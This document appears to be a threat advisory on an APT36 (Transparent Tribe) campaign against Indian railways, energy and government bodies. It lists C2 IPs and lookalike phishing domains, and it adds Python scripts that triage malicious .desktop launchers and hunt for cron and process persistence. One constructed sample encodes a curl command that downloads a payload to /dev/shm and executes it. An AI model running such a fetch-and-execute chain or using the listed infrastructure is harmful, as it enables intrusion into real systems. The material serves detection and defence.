In July 2025, threat actor APT36 (also known as Transparent Tribe), a group associated with Pakistan-linked cyber operations, launched a sophisticated campaign targeting India’s critical infrastructure, including railways, oil & gas sectors, and government entities such as the Ministry of External Affairs. This operation marks a shift from their traditional military focus to broader civilian and infrastructure targets, combining phishing with advanced persistence tools.
Severity Level: High
Threat Details
- Initial Access: Delivered as Linux .desktop launcher files posing as PDF documents. Execution depends on the user opening the file; no software vulnerability is exploited.
- Execution: The Exec= line of the malicious .desktop file decoded and ran a Base64-encoded shell script that downloaded second-stage payloads from remote servers and stored them under daemon-like, deceptive filenames (emacs-bin, crond-98).
- Persistence: Cron jobs re-launched the payload, so the malware survived reboots and kept its foothold without further user interaction.
- Command and Control (C2)
- Variant 1: Single C2 IP: 209.38.203.53
- Variant 2: Redundant C2s: 165.232.114.63, 165.22.251.224
- Poseidon C2: 64.227.189.57, 178.128.204.138, 99.83.175.80
- Payload: The second-stage payload was Poseidon, a Mythic C2-based backdoor written in Go. It allowed long-term access, credential harvesting, system reconnaissance, and lateral movement.
- Anti-Analysis Features: Payloads used sleep functions and environment checks to evade sandboxing and dynamic analysis.
- Phishing Infrastructure
  - Over 100 fake domains mimicking Indian entities, such as:
    - drdo.gov.in.nominationdrdo.report
    - mod.gov.in.defencepersonnel.support
    - indianarmy.nic.in.ministryofdefenceindia.org
  - In each case the genuine hostname (drdo.gov.in, mod.gov.in, indianarmy.nic.in) appears only as leading subdomain labels; the registrable domain (nominationdrdo.report, defencepersonnel.support, ministryofdefenceindia.org) is attacker-controlled.
  - Hosted primarily on AlexHost, known for abuse-tolerant hosting.
- Infrastructure Insights
- The Poseidon backdoor communicated over TLS 1.3 on port 7443, presenting certificates characteristic of Mythic C2 servers.
- Pivoting off the infrastructure revealed over 350 Mythic-powered servers, some likely used by other actors.
- Target Sectors: Indian Railways, Oil & Gas Infrastructure, Ministry of External Affairs, and Broader Indian government networks
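The initial-access artifact described above (a .desktop launcher named like a PDF whose Exec= line decodes and runs a Base64 blob) can be triaged offline. The following is an added example, not code from the original advisory or from hunt.io: it parses a constructed .desktop file (the URL, paths and embedded command are invented placeholders, not campaign samples), recovers the Base64-encoded command, and reports the download URL, staging directory and payload filenames. The mail-gateway helper for `.pdf.desktop` double extensions is likewise an illustration.

```python
import base64
import binascii
import re

# Constructed sample in the style described in the advisory. The inner
# command is a harmless placeholder; 198.51.100.7 is a documentation address.
_INNER = ("curl -s http://198.51.100.7/stage1 -o /dev/shm/emacs-bin "
          "&& chmod +x /dev/shm/emacs-bin && /dev/shm/emacs-bin")
SAMPLE_DESKTOP = f"""[Desktop Entry]
Type=Application
Name=Nomination_Form.pdf
Icon=application-pdf
Exec=bash -c "echo {base64.b64encode(_INNER.encode()).decode()} | base64 -d | bash"
Terminal=false
"""

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long Base64 runs only
URL_RE = re.compile(r"https?://[^\s'\"]+")
SUSPICIOUS_PATHS = ("/dev/shm/", "/tmp/", "/var/tmp/", ".local/share/")
SUSPICIOUS_NAMES = ("emacs-bin", "crond-98")       # filenames named in the advisory
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


def parse_desktop(text):
    """Return the key=value entries of a .desktop file (group headers ignored)."""
    entry = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "[")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entry[key.strip()] = value.strip()
    return entry


def decode_base64_blobs(command):
    """Decode every long Base64 run in a command that yields printable text."""
    decoded = []
    for match in B64_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def analyse_desktop(text):
    """Return (entries, decoded payload commands, list of human-readable findings)."""
    entry = parse_desktop(text)
    findings = []
    name = entry.get("Name", "")
    if name.lower().endswith(DOC_EXTS):
        findings.append(f"Name masquerades as a document: {name}")
    exec_cmd = entry.get("Exec", "")
    if re.search(r"base64\s+(-d|--decode)", exec_cmd):
        findings.append("Exec decodes Base64 at launch")
    payloads = decode_base64_blobs(exec_cmd)
    for payload in payloads:
        for url in URL_RE.findall(payload):
            findings.append(f"decoded payload fetches {url}")
        for path in SUSPICIOUS_PATHS:
            if path in payload:
                findings.append(f"decoded payload writes to {path}")
        for known in SUSPICIOUS_NAMES:
            if known in payload:
                findings.append(f"decoded payload uses known filename {known}")
    return entry, payloads, findings


def is_disguised_attachment(filename):
    """Mail-gateway check: 'report.pdf.desktop'-style double extensions."""
    lower = filename.lower()
    return lower.endswith(".desktop") and lower[: -len(".desktop")].endswith(DOC_EXTS)


if __name__ == "__main__":
    _, payloads, findings = analyse_desktop(SAMPLE_DESKTOP)
    print("decoded:", payloads)
    for finding in findings:
        print("-", finding)
```

Run it against a suspect file with `analyse_desktop(open(path).read())`; the decoded command is what a reviewer should read before the Exec= line is trusted, since the launcher's visible Name and Icon say nothing about what it runs.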
Recommendations
- Block/alert on emails containing .desktop attachments or disguised .pdf.desktop extensions.
- Alert on cron jobs (user crontabs, /etc/cron.d entries, @reboot lines) whose commands reference payloads under /dev/shm/ or ~/.local/share/.
- Hunt for processes like emacs-bin, crond-98 being executed by non-root users.
- Reinforce training to hover over links and check file extensions—alert users to .desktop disguised as .pdf.
- Inform users about the risks of downloading or opening files from platforms like Google Drive that impersonate government sources.
- Disallow execution of .desktop files from user downloads or email directories.
- Apply application control to prevent execution of unknown binaries and scripts (on Linux: SELinux, AppArmor or fapolicyd; on Windows: AppLocker or similar).
- Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/6cac3abe1178b2a08786dccdf753badb01423f98fd4377030fbc5cca45f3092a/iocs
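The cron and process hunts recommended above can be scripted against collected host data. This is an added example, not code from the original advisory or from hunt.io: it runs over constructed crontab lines (as `crontab -l -u <user>` would print them) and constructed `ps -eo user,pid,comm,args --no-headers` output, flagging scheduled commands that run from volatile or user-writable directories and processes with the advisory's payload names running as non-root users. The users, PIDs and paths are invented.

```python
import re
from dataclasses import dataclass

SUSPICIOUS_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/", "/.local/share/")
SUSPICIOUS_NAMES = ("emacs-bin", "crond-98")   # filenames named in the advisory

# Constructed per-user crontab output keyed by user (not real host data).
SAMPLE_CRONTABS = {
    "root": ["0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1"],
    "analyst": [
        "@reboot /dev/shm/emacs-bin >/dev/null 2>&1",
        "*/5 * * * * /home/analyst/.local/share/crond-98",
        "0 8 * * 1 /home/analyst/bin/backup.sh",
    ],
}

# Constructed `ps -eo user,pid,comm,args --no-headers` output.
SAMPLE_PS = """root 812 crond /usr/sbin/crond -n
root 1043 sshd sshd: /usr/sbin/sshd -D
analyst 2210 emacs-bin /dev/shm/emacs-bin
analyst 2288 crond-98 /home/analyst/.local/share/crond-98
analyst 2301 firefox /usr/lib/firefox/firefox
"""


@dataclass
class Finding:
    source: str     # "cron" or "process"
    user: str
    evidence: str   # the offending crontab line or process entry
    reason: str


def hunt_cron(crontabs):
    """Flag crontab lines whose command runs a payload from a suspicious location."""
    findings = []
    for user, lines in crontabs.items():
        for line in lines:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            # "@reboot cmd" has one schedule token, otherwise five.
            parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
            command = parts[-1] if len(parts) > 1 else ""
            if any(d in command for d in SUSPICIOUS_DIRS):
                findings.append(Finding("cron", user, line,
                                        "command runs from a volatile or user-writable directory"))
            elif any(n in command for n in SUSPICIOUS_NAMES):
                findings.append(Finding("cron", user, line,
                                        "command matches a known payload filename"))
    return findings


def hunt_processes(ps_output):
    """Flag non-root processes by payload name or by a suspicious executable path."""
    findings = []
    for line in ps_output.splitlines():
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        user, pid, comm, args = fields
        exe = args.split()[0]
        if user != "root" and (comm in SUSPICIOUS_NAMES or any(d in exe for d in SUSPICIOUS_DIRS)):
            findings.append(Finding("process", user, f"pid {pid} {args}",
                                    f"'{comm}' run by non-root user {user} from {exe}"))
    return findings


if __name__ == "__main__":
    for f in hunt_cron(SAMPLE_CRONTABS) + hunt_processes(SAMPLE_PS):
        print(f"[{f.source}] {f.user}: {f.evidence} ({f.reason})")
```

On a live host, build the `crontabs` mapping from `crontab -l -u "$u"` for each user in /etc/passwd (and add /etc/cron.d files, which carry an extra user column) and feed the `ps` invocation above to `hunt_processes`; the root-only exclusion is deliberate, because a real `crond` runs as root from /usr/sbin, so a daemon-like name under a non-root user is the signal.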
MITRE ATT&CK
| Tactic | Technique | ID |
|---|---|---|
| Reconnaissance | Phishing for Information: Spearphishing Attachment | T1598.002 |
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Initial Access | Phishing: Spearphishing Link | T1566.002 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Scheduled Task/Job: Cron | T1053.003 |
| Persistence | Boot or Logon Initialization Scripts: RC Scripts | T1037.004 |
| Defense Evasion | Masquerading | T1036 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Virtualization/Sandbox Evasion: System Checks | T1497.001 |
| Discovery | System Information Discovery | T1082 |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
| Command and Control | Proxy: Multi-hop Proxy | T1090.003 |
| Command and Control | Web Service | T1102 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Impact | Data Manipulation | T1565 |
Source:
- https://hunt.io/blog/apt36-india-infrastructure-attacks